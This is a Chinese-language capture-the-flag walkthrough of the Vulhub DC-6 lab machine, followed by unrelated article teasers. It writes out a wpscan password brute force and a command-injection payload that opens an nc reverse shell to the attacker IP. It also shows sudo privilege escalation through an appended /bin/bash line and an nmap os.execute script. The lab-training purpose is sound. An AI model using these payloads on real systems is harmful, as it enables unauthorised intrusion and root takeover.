Vulhub 靶场训练 DC-6解析

一、搭建环境

kali充当攻击机 ip地址是:192.168.200.14

DC-6充当靶机 : IP地址暂时未知

注意:让两台机器的使用同一种网络适配器

二、信息收集

1、探索同网段存活的主机

①第一种方法

arp-scan -l

1707095519_65c035dfca6eae5bc4634.png!small?1707095520916

②第二种方法

netdiscover -i eth0 -r 192.168.200.0/24

1707095535_65c035ef9936eb28e1d5a.png!small?1707095536824

③第三种方法

nmap -sP 192.168.200.0/24 -T4 

1707095543_65c035f7963249e32217c.png!small?1707095545160

2、开放端口信息

nmap -sS -A 192.168.200.7 -p 1-65535

1707095554_65c03602e9c495b7c42e1.png!small?1707095556640

80端口和22端口开放,登录网页

应该是被重定向,在kali当中找到hosts文件,将192.168.200.7 wordy的关系写入进去

1707095570_65c03612151a213d35e65.png!small?1707095570979

1707095575_65c03617d0a13c3348a1b.png!small?1707095576860

刷新网页后,看到网页使用的是wordpress cms+

该靶机的CMS系统为wordpress5.1.1

1707095586_65c0362212d1abe5c5905.png!small?1707095587144

根据CMS版本思路:

第一:利用目录扫描工具寻找该CMS的后台管理系统,然后再爆破密码和账号,进入后台管理系统寻找可利用的点。

利用kali工具dirb,发现后台目录

dirb http://192.168.200.7/  

1707095597_65c0362d04191952e6969.png!small?1707095598571

后台界面

1707095604_65c03634375607f97821e.png!small?1707095605213

3、后台爆破

继续爆破账号密码,使用针对该CMS的账号爆破工具wpscan,猜解密码:

wpscan --url http://wordy -e u 
#指定url,枚举其中的用户名

1707095612_65c0363c4e4a67f636e7d.png!small?1707095614357

将以上用户名保存在一个新的文件当中,user.txt

cewl根据本文生成密码,然后再利用爆破工具暴力破解

提示信息

1707095621_65c0364570005254ff2bd.png!small?1707095622575

提示用kali自带的字典rockyou.txt导出包含k01的密码导出来的字典爆破(没解压的先解压,我之前解压过了)

cat /usr/share/wordlists/rockyou.txt | grep k01 > pwd.txt 

账号和密码都有了开始爆破

wpscan --url wordy -U user.txt -P pwd.txt

1707095630_65c0364ee8b23d61b86f2.png!small?1707095632118

**账号:**mark

**密码:**helpdesk01

第二:在网络上搜索该版本的漏洞,或使用searchsploit,msfconsole等工具寻找漏洞及利用方法。

登陆后台

1707095642_65c0365a3dcac26de7cff.png!small?1707095643411

三、漏洞探测

这里寻找到两个线索,

第一:该网站使用了activity monitor工具。

第二:在activity monitor目录的tools一栏存在可注入的点

1707095650_65c036622950a3df3cb78.png!small?1707095651193

根据这两个线索,本文又有两个思路:

第一:既然会回传用户的输入到后台解析,那么是否可以修改数据包达到我们的目的呢?可以利用BP抓包测试。

第二:利用前文提到的漏洞扫描工具对activity monitor进行扫描,寻找历史漏洞。

利用第一个思路,输入qquhu.com,点击lookup

1707095659_65c0366b6b491361588b4.png!small?1707095661280

BURP抓包测试,发现管道符后面的whoami运行了。说明此处存在漏洞。

反弹shell

利用该漏洞反弹一个shell。

首先在kali虚拟机上开启监听

nc -lvvp 6666

将包改成 qq.com | nc -e /bin/bash 192.168.200.14 6666 # kali的IP地址

执行成功

1707095673_65c03679505a31dace388.png!small?1707095674886

利用python开启交互模式。输入命令

python -c 'import pty;pty.spawn("/bin/bash")'

打开home目录,查找新的线索:

在mark目录下存在一个things-to-do文件,发现了graham的账号密码

1707095684_65c03684de3bd9d7ec5b1.png!small?1707095686048

然后登陆graham的账号密码,登陆失败,该靶机还开启了22端口因此尝试ssh登录。

ssh graham@192.168.200.7

1707095693_65c0368d66818a5b67596.png!small?1707095694505

提权

sudo -l  #尝试sudo -l j免密登录
User graham may run the following commands on dc-6:(jens) NOPASSWD: /home/jens/backups.sh
# 看看当前用户拥有的权限,可以对backups.sh执行写操作cd /home/jens
# 写入/bin/bash,执行,切换到jens的shell
echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh
# 发现可以以root权限执行nmapsudo -l
User jens may run the following commands on dc-6:(root) NOPASSWD: /usr/bin/nmap
#发现可以用root权限执行nmap,nmap在早期版本是可以用来提权的将提权代os.execute("/bin/sh")
写入一个文件中。echo "os.execute('/bin/bash')" > getshell
sudo nmap --script=getshell

1707095702_65c03696a6a490c1d42f7.png!small?1707095704065

进入/home/jens目录,打开backups.sh文件,里面是一个压缩命令行,说明该文件可以运行。

1707095711_65c0369f79a3b55049d27.png!small?1707095712358

1707095716_65c036a4a787e9d43cd1e.png!small?1707095717625

可以在该文件中添加/bin/bash语句,则可以打开jens的shell了。

echo '/bin/bash' >> backups.sh #在文件中添加命令行
sudo ./backups.sh #运行失败,因为此时是graham哟用户
sudo -u jens ./backups.sh #-u 指定用户

1707095724_65c036acd06b0419f788a.png!small?1707095725872

jens可以免密码运行root权限nmap,nmap可以运行文件

1707095732_65c036b45b6330e068763.png!small?1707095733832

# nmap提权:以root的权限用nmap执行这个脚本,打开root shell的文件,再让nmap执行

echo "os.execute('/bin/bash')" > getshell
sudo nmap --script=getshell

1707095741_65c036bdb06199e887c21.png!small?1707095742827

在root目录下发现flag

1707095753_65c036c953a6af1e71e02.png!small?1707095754399

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/697648.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Python内置函数67个语法、参数和用法详解

要获取Python解释器中所有当前可用的内置函数和变量的完整列表,您可以在Python解释器中使用dir(__builtins__)命令。这将返回一个包含所有内置函数、异常和其他内置对象的列表。 分为10类 数学运算(7): abs 绝对值divmod 商和余数max 最大min最小pow 指数幂round 取整sum 求…

npm/nodejs安装、切换源

前言 发现自己电脑上没有npm也没有node很震惊,难道我没写过代码么?不扯了,进入正题哈哈…… 安装 一般没有npm的话会报错: 无法将“npm”项识别为 cmdlet、函数、脚本文件或可运行程序的名称而且报这个错,我们执行…

【骑行新纪元】社交风暴来袭,你准备加入骑友圈了吗?

当你的自行车轮轻轻滑过清晨的露水,你是否曾想与志同道合的骑友分享这一刻的喜悦?骑行,这个曾经只是简单运动的代名词,如今正在悄然转变。随着科技的进步和社交平台的发展,骑行不再只是一种健身方式,它还带…

【机器学习】是什么?——讲解

机器学习 机器学习是人工智能(AI)的一个子领域,它提供了系统通过数据学习并改进其性能的能力,而不需要人为进行显式编程,机器学习模型利用大量的数据样本(训练数据)来学习如何识别模式和关系&a…

C-指针-010

1指针 1.1语法: 【基类型*指针变量名】 【int *p&a】1.2语义: 【基类型】:指针变量指向的目标的数据类型 【*】:表示此时定义的变量是一个指针类型的变量 【&a】:一块存放着int类型数据的空间的地址 【*p】…

slot全局属性 <slot>标签</slot> ::slotted()伪元素 笔记240223

slot全局属性 标签 ::slotted()伪元素 MDN HTML全局属性 MDN HTML全局属性 slot MDN HTML <slot>标签元素 MDN CSS ::slotted()为元素 MDN 使用 templates and slots <slot>标签 <slot>标签是的 display 是 contents 在Web开发中&#xff0c;<s…

【高德地图】Android搭建3D高德地图详细教

&#x1f4d6;Android搭建3D高德地图详细教程 &#x1f4d6;第1章 高德地图介绍✅了解高德地图✅2D地图与3D地图 &#x1f4d6;第2章 搭建3D地图并显示✅第 1 步&#xff1a;创建 Android 项目✅第 2 步&#xff1a;获取高德Key✅第 3 步&#xff1a;下载地图SDK✅第 4 步&…

照片上多余的人怎么处理?这几种方法让你的照片更完美!

照片怎么去掉多余人像&#xff1f;这是许多摄影爱好者经常遇到的问题。有时候&#xff0c;我们拍摄了一张非常美好的照片&#xff0c;但由于某些原因&#xff0c;照片中出现了不希望出现的人物。这时候&#xff0c;我们该如何处理呢&#xff1f;下面&#xff0c;我将分享几种常…

2.5网安学习第二阶段第五周回顾(个人学习记录使用)

本周重点 ①多进程和多线程 1、进程和线程 2、多线程爆破 ②Redis数据库 1、Redis的使用 2、Redis持久化 3、Redis未授权免密登录 ③嗅探和Python攻击脚本 1、嗅探&#xff08;端口扫描和IP扫描&#xff09; 2、SCAPY的应用 3、Python攻击脚本&#xff08;SYN半连接…

【More Effective C++】条款22:采用op+=取代op+优势

采用operator实现operator优点&#xff1a; 降低维护成本&#xff0c;只需要维护operator即可&#xff1b;如果operator为publicoperator不需要称为class的友元&#xff1b;通过模板的方式自动实现operator版本&#xff1b;提供两种操作方式&#xff0c;operator效率高&#x…

计算机网络-局域网

文章目录 局域网局域网拓扑结构以太网以太网传输介质以太网时隙提高传统以太网带宽的途径以太网帧格式 局域网协议IEEE 802参考模型IEEE802.2协议LLC帧格式及其控制字段LLC提供的三种服务 IEEE 802.3协议IEEE 802.4协议IEEE 802.5协议 高速局域网100M以太网千兆以太网万兆以太网…

冲突管理最佳实践

任何团队都无法避免冲突&#xff0c;如何有效管理冲突&#xff0c;将冲突转化为团队成长和凝聚的动力&#xff0c;是任何一个团队管理者的必修课。原文: Best Practices for Managing Conflict in Engineering Management Obie Fernandez Unsplash 冲突在任何组织中都不可避免&…

计算机网络中的与或非运算

三种基本逻辑运算关系 搭建中小公司网络&#xff0c;根据网址计算&#xff0c;用户的人数 需要ip和掩码&#xff0c;确定可分配的ip数 与运算电路为串联电路&#xff0c;的&#xff0c;A,B的组合情况 具体参考三种基本逻辑运算关系

图片参考网站

摄图网-正版高清图片免费下载_商用设计素材图库 (699pic.com) AIGC数字艺术素材图片-数字艺术-数字艺术图片-摄图网 (699pic.com) 花瓣网 - 陪你做生活的设计师&#xff08;创意灵感天堂&#xff0c;搜索、发现设计灵感、设计素材&#xff09; (huaban.com) 千图网-免费在线…

python视频流处理工具

在当今数字化的时代&#xff0c;视频处理应用变得越来越普遍。无论是视频流分析、实时视频处理还是视频流转码&#xff0c;都需要强大的工具来实现。Python Vidgear 库就是这样一个工具&#xff0c;它为开发人员提供了丰富的功能&#xff0c;用于处理实时视频流。本文将深入探讨…

Android中Transition过渡动画的简单使用

前些天发现了一个蛮有意思的人工智能学习网站,8个字形容一下"通俗易懂&#xff0c;风趣幽默"&#xff0c;感觉非常有意思,忍不住分享一下给大家。 &#x1f449;点击跳转到教程 一、布局xml文件代码如下&#xff1a; <?xml version"1.0" encoding&quo…

Feign接口GET方式注意事项

1. GET请求方式&#xff0c;对于feign接口一定得用 RequestParam/SpringQueryMap等注解声明是路径参数&#xff0c;否则会自动识别为body params报错(controller接口则可不用&#xff0c;springmvc会自动匹配相同字段名) demo: API 层controller接口&#xff1a; 前端传参可直…

ABB触摸屏维修工控机显示屏维修CP405 A1/A0

ABB人机界面维修常见故障&#xff1a;黑屏白屏花屏&#xff0c;按触摸屏无反应或反应慢触摸不好&#xff0c;内容错乱&#xff0c;进不了系统界面&#xff0c;无背光背光暗&#xff0c;有背光无字符&#xff0c;不能通信&#xff0c;按键无无反应等均可维修。 此维修检测方法有…

geoserver 热力图样式

<?xml version"1.0" encoding"ISO-8859-1"?> <StyledLayerDescriptor version"1.0.0" xsi:schemaLocation"http://www.opengis.net/sld StyledLayerDescriptor.xsd" xmlns&…

英文输入法(C 语言)

题目 主管期望你来实现英文输入法单词联想功能&#xff0c;需求如下&#xff1a; 依据用户输入的单词前缀&#xff0c;从已输入的英文语句中联想出用户想输入的单词。按字典序输出联想到的单词序列&#xff0c;如果联想不到&#xff0c;请输出用户输入的单词前缀。 注意 英…